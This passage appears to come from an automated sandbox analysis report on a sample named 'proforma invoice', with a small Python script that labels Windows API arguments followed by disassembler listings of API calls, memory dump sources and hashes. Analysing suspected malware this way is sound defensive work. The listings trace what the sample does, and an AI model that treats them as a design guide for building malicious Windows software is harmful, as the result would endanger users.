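        names.append(f"0x{rest:X}")
    return "|".join(names) or "MB_OK"


def annotate(rec):
    """Render a parsed call with numeric arguments replaced by SDK names where known."""
    api, args = rec["api"], list(rec["args"])
    if api in ("SendMessageW", "PostMessageW") and len(args) >= 3:
        msg, wparam = _hex(args[1]), _hex(args[2])
        if msg in WINDOW_MESSAGES:
            args[1] = WINDOW_MESSAGES[msg]
        if msg in (0x0100, 0x0101) and wparam in VIRTUAL_KEYS:
            args[2] = VIRTUAL_KEYS[wparam]
        elif msg == 0x00A1 and wparam in HIT_TEST:
            args[2] = HIT_TEST[wparam]
    elif api == "socket" and len(args) >= 3:
        names = ({2: "AF_INET"}, {1: "SOCK_STREAM"}, {6: "IPPROTO_TCP"})
        args[:3] = [table.get(_hex(a), a) for table, a in zip(names, args[:3])]
    elif api == "MessageBoxW" and len(args) >= 4 and _hex(args[3]) is not None:
        args[3] = decode_mb_flags(_hex(args[3]))
    return f"{api}({', '.join(args)})"


def describe(lines):
    """Annotate every API bullet and flag the 'release all modifier keys' idiom."""
    recs = [r for r in map(parse_api_line, lines) if r]
    out = [annotate(r) for r in recs]
    key_ups = {_hex(r["args"][2]) for r in recs
               if r["api"] == "PostMessageW" and len(r["args"]) >= 3
               and _hex(r["args"][1]) == 0x0101}
    if MODIFIERS <= key_ups:
        out.append("-> posts WM_KEYUP for Shift, Ctrl, Alt and LWin: releases every modifier key")
    return out


# Bullets copied from the function listings in this report.
SAMPLE_LINES = [
    "• GetParent.USER32(?), ref: 00B0AEF9",
    "• PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0AF9D",
    "• PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0AFBC",
    "• PostMessageW.USER32(?,00000101,00000012,?), ref: 00B0AFFD",
    "• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B0B020",
    "• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B380C3",
    "• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B21112",
    "• WSAGetLastError.WSOCK32 ref: 00B21121",
    "• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0DADC",
]

if __name__ == "__main__":
    for entry in describe(SAMPLE_LINES):
        print(entry)
```

Unknown message numbers (for example the 0x041C in the SendMessageW listing above) are deliberately left as printed rather than guessed; extend WINDOW_MESSAGES only with values you have confirmed against the SDK headers for the control class the function actually targets.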
                  APIs
                  • GetConsoleCP.KERNEL32(00AE3CD6,?,?,?,?,?,?,?,?,00AD5BA3,?,?,00AE3CD6,?,?), ref: 00AD5470
                  • __fassign.LIBCMT ref: 00AD54EB
                  • __fassign.LIBCMT ref: 00AD5506
                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AE3CD6,00000005,00000000,00000000), ref: 00AD552C
                  • WriteFile.KERNEL32(?,00AE3CD6,00000000,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD554B
                  • WriteFile.KERNEL32(?,?,00000001,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD5584
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
                  • Instruction ID: 2b8ec10df840b18c6e83db769abb81dbdb34fc9aafcc9a411c4e5b9fd1bfb3e8
                  • Opcode Fuzzy Hash: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
                  • Instruction Fuzzy Hash: 1C519FB1E00649AFDB11CFA8E845AEEBBF9EF09300F14411BE556E7391D6309A81CB61
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 00AC2D4B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00AC2D53
                  • _ValidateLocalCookies.LIBCMT ref: 00AC2DE1
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00AC2E0C
                  • _ValidateLocalCookies.LIBCMT ref: 00AC2E61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: csm
                  • API String ID: 1170836740-1018135373
                  • Opcode ID: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
                  • Instruction ID: dc9e79ef6517f70d5ea39cc0ba616b5d3837b77291360a4ea2becd64bb11cf96
                  • Opcode Fuzzy Hash: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
                  • Instruction Fuzzy Hash: F441B034A00209ABCF10DF68C845FAEBBB5BF44324F168159E815AB392DB31AA01CBD0
                  APIs
                    • Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                    • Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B
                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B21112
                  • WSAGetLastError.WSOCK32 ref: 00B21121
                  • WSAGetLastError.WSOCK32 ref: 00B211C9
                  • closesocket.WSOCK32(00000000), ref: 00B211F9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 2675159561-0
                  • Opcode ID: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
                  • Instruction ID: f22154e089e2441bfb80bae9ceb0df126cf21d90890ab901377dadaf6938e24d
                  • Opcode Fuzzy Hash: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
                  • Instruction Fuzzy Hash: 07410931600214AFDB109F58D885BAEBBE9FF45325F148599FD09AB291C770EE41CBE1
                  APIs
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16
                  • lstrcmpiW.KERNEL32(?,?), ref: 00B0CF45
                  • MoveFileW.KERNEL32(?,?), ref: 00B0CF7F
                  • _wcslen.LIBCMT ref: 00B0D005
                  • _wcslen.LIBCMT ref: 00B0D01B
                  • SHFileOperationW.SHELL32(?), ref: 00B0D061
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                  • String ID: \*.*
                  • API String ID: 3164238972-1173974218
                  • Opcode ID: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
                  • Instruction ID: 2eb46657a5b075a1b86ea6c79e2f578db0dfb1cb7d70543c583ca6bdbcd1636c
                  • Opcode Fuzzy Hash: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
                  • Instruction Fuzzy Hash: 824117719452195EDF12EFA4D981EDE7BF9EF48380F1001E6E509E7181EF34A648CB51
                  APIs
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B32E1C
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E4F
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E84
                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B32EB6
                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B32EE0
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32EF1
                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B32F0B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend
                  • String ID:
                  • API String ID: 2178440468-0
                  • Opcode ID: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
                  • Instruction ID: 2581fe25b7047acc6174c5a1830cae6b1d7fff54fe3ebc7754d14c6b8d4b31cd
                  • Opcode Fuzzy Hash: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
                  • Instruction Fuzzy Hash: 90310635604260AFDB21CF5CDC86F6937E1FB9A710F2501A4FA049F2B1CB71A881DB51
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07769
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B0778F
                  • SysAllocString.OLEAUT32(00000000), ref: 00B07792
                  • SysAllocString.OLEAUT32(?), ref: 00B077B0
                  • SysFreeString.OLEAUT32(?), ref: 00B077B9
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B077DE
                  • SysAllocString.OLEAUT32(?), ref: 00B077EC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  • Opcode ID: 95863f4ef15ff580beab4bd7c8d3ad98e420d1cc7e01913dec614ff4fcf95fbd
                  • Instruction ID: e1ee94b5cd6d62ac54b22666b727b3544ad21a77defc5bfd6fe930f82ec2d9c3
                  • Opcode Fuzzy Hash: 95863f4ef15ff580beab4bd7c8d3ad98e420d1cc7e01913dec614ff4fcf95fbd
                  • Instruction Fuzzy Hash: 5F218376A04219BFDB10DFA8CC88CBB7BECEB097A47148065B915DB291DA70ED418764
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07842
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07868
                  • SysAllocString.OLEAUT32(00000000), ref: 00B0786B
                  • SysAllocString.OLEAUT32 ref: 00B0788C
                  • SysFreeString.OLEAUT32 ref: 00B07895
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B078AF
                  • SysAllocString.OLEAUT32(?), ref: 00B078BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  • Opcode ID: 6e6c112431d4f6429a6fec9fb67adf973affe8b2e8bf4a763f16b0b9a4174c11
                  • Instruction ID: d4cb4d906aebef2989e1bdbbbd14f62de7d0527941d9aeb639d8984c5e1e9735
                  • Opcode Fuzzy Hash: 6e6c112431d4f6429a6fec9fb67adf973affe8b2e8bf4a763f16b0b9a4174c11
                  • Instruction Fuzzy Hash: C9215132A04204BFDB109BE9DC8CDAABBECEB097607148165B915DB2E1DE74EC41CB64
                  APIs
                  • GetStdHandle.KERNEL32(0000000C), ref: 00B104F2
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B1052E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  • Opcode ID: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
                  • Instruction ID: 28bbe475bfe018928c521f9be3ce876a7ba0b7cd50919df4fa4da1748b3a38e4
                  • Opcode Fuzzy Hash: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
                  • Instruction Fuzzy Hash: FE218071510305ABDB20AF69DC84ADA7BF5EF54724F604A59F8A1E72E0D7B099D0CF20
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B10601
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  • Opcode ID: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
                  • Instruction ID: acb0116e48c4b6fa42156901fd379b7a24542cb530fe3dad6c3393a755c437a4
                  • Opcode Fuzzy Hash: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
                  • Instruction Fuzzy Hash: 50219575510305ABDB20AF69DC44ADA77E4FF95720F600A59F8A1E72E0DBF098E0CB10
                  APIs
                    • Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                    • Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
                    • Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B34112
                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B3411F
                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B3412A
                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B34139
                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B34145
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CreateObjectStockWindow
                  • String ID: Msctls_Progress32
                  • API String ID: 1025951953-3636473452
                  • Opcode ID: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
                  • Instruction ID: bf5380878b7b8f66134577ee5030cb3c1583f8c7d5b68cc2d8e9cd5e7f8274e7
                  • Opcode Fuzzy Hash: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
                  • Instruction Fuzzy Hash: 2A11B2B2140219BEEF118F64CC86EE77FADEF08798F114111FA18A6090CB729C61DBA4
                  APIs
                    • Part of subcall function 00ADD7A3: _free.LIBCMT ref: 00ADD7CC
                  • _free.LIBCMT ref: 00ADD82D
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00ADD838
                  • _free.LIBCMT ref: 00ADD843
                  • _free.LIBCMT ref: 00ADD897
                  • _free.LIBCMT ref: 00ADD8A2
                  • _free.LIBCMT ref: 00ADD8AD
                  • _free.LIBCMT ref: 00ADD8B8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction ID: 6cdbb734768161fba9956c197a71fd4a872b6a437e7ebc21e0cb0afb545d4a52
                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction Fuzzy Hash: 3B115E71540B04AAD621BFB0CE47FCB7BDCAF50700F400826B29FAA292DA65B6059760
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B0DA74
                  • LoadStringW.USER32(00000000), ref: 00B0DA7B
                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0DA91
                  • LoadStringW.USER32(00000000), ref: 00B0DA98
                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0DADC
                  Strings
                  • %s (%d) : ==> %s: %s %s, xrefs: 00B0DAB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message
                  • String ID: %s (%d) : ==> %s: %s %s
                  • API String ID: 4072794657-3128320259
                  • Opcode ID: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
                  • Instruction ID: dd15663cbec18de05e87314898cfb7a2af0159120ca8b8f1f3faf029ffe4c9c3
                  • Opcode Fuzzy Hash: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
                  • Instruction Fuzzy Hash: BA014FF25002087BE7509BE09D89EEA3AACE708701F500495B706F3081EA749E844B74
                  APIs
                  • InterlockedExchange.KERNEL32(014EE8D8,014EE8D8), ref: 00B1097B
                  • EnterCriticalSection.KERNEL32(014EE8B8,00000000), ref: 00B1098D
                  • TerminateThread.KERNEL32(00540050,000001F6), ref: 00B1099B
                  • WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 00B109A9
                  • CloseHandle.KERNEL32(00540050), ref: 00B109B8
                  • InterlockedExchange.KERNEL32(014EE8D8,000001F6), ref: 00B109C8
                  • LeaveCriticalSection.KERNEL32(014EE8B8), ref: 00B109CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                  • String ID:
                  • API String ID: 3495660284-0
                  • Opcode ID: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
                  • Instruction ID: 18e4c394be1e0fc8fde32a8d461b1e2de032b5fccb07ea40e9f8c248817629e8
                  • Opcode Fuzzy Hash: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
                  • Instruction Fuzzy Hash: 4FF0CD31442912BBD7515B94EE89ADA7A65FF05742FA01015F101A18A1CBB594B5CF90
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00AA5D30
                  • GetWindowRect.USER32(?,?), ref: 00AA5D71
                  • ScreenToClient.USER32(?,?), ref: 00AA5D99
                  • GetClientRect.USER32(?,?), ref: 00AA5ED7
                  • GetWindowRect.USER32(?,?), ref: 00AA5EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Rect$Client$Window$Screen
                  • String ID:
                  • API String ID: 1296646539-0
                  • Opcode ID: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
                  • Instruction ID: 94c0df351809f63ef0ee5ec86818efcfb0f2e9963ab6eee85aec14946876219c
                  • Opcode Fuzzy Hash: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
                  • Instruction Fuzzy Hash: E7B16A35A00A8ADBDB24CFB9C4407EEB7F5FF58310F14841AE8A9D7290DB34AA51DB54
                  APIs
                  • __allrem.LIBCMT ref: 00AD00BA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD00D6
                  • __allrem.LIBCMT ref: 00AD00ED
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD010B
                  • __allrem.LIBCMT ref: 00AD0122
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD0140
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
